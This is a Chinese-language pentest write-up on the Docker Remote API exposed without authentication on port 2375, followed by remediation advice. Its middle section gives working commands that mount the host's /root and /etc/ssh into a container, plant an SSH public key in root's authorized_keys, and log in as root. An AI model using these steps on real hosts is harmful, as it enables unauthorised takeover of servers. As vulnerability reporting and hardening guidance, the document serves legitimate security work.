Docker Remote API未授权访问

漏洞起因

使用docker swarm的时候，管理的docker 节点上会开放一个TCP端口2375，绑定在0.0.0.0上，http访问会返回 404 page not found ，其实这是 Docker Remote API，可以执行docker命令

漏洞风险

Docker daemon api是使用url代替命令行来操作docker，docker swarm 是docker下的集群管理工具，在开放2375端口来监听集群容器时，会调用这个api，可以执行docker命令，root权限启动docker情况下可直接可以通过创建容器映射ssh配置文件，配置自己的key公钥，使用root+key私钥连接服务器。

渗透过程

用awvs扫描项目，发现了一个Docker Engine API 无需身份验证即可访问漏洞

浏览器访问一下http://127.0.0.1:2375/info ，确实有东西

随便找一个装有docker的虚拟机连接docker试试，看到了创建的docker容器(ps直接看到内容，说明这个主机的2375是没有ssl验证的，基本满足入侵要求)

# docker -H tcp://10.20.17.215:2375 ps

获取服务器root权限思路就比较明确了

创建一个容器

映射ssh配置文件目录

进入容器

# docker -H tcp://127.0.0.1:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

先进入容器，检查一下是否启用了root用户

# cat /tmp/ssh_etc/sshd_config

在自己的机器上生成一对新的key

# ssh-keygen -t rsa -C "hello@world.com"
# Enter file in which to save the key (/root/.ssh/id_rsa): /home/id_rsa 
# (其他选项回车即可)

查看/home/id_rsa.pub内容

# cat /home/id_rsa.pub

在docker容器中注入ssh pub key

# cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA....     # 这里粘贴你刚刚在自己机器生成的/tmp/id_rsa.pub
>EOF

使用生成的/home/id_ras私钥登录服务器

ssh -i /home/id_rsa root@127.0.0.1

至此，拿到目标服务器root账号权限，渗透结束。

修复建议

1.对2375端口做网络访问控制，如ACL控制，或者访问规则；

2.通过CA认证方式使用Remote API，参考：https://docs.docker.com/engine/security/https/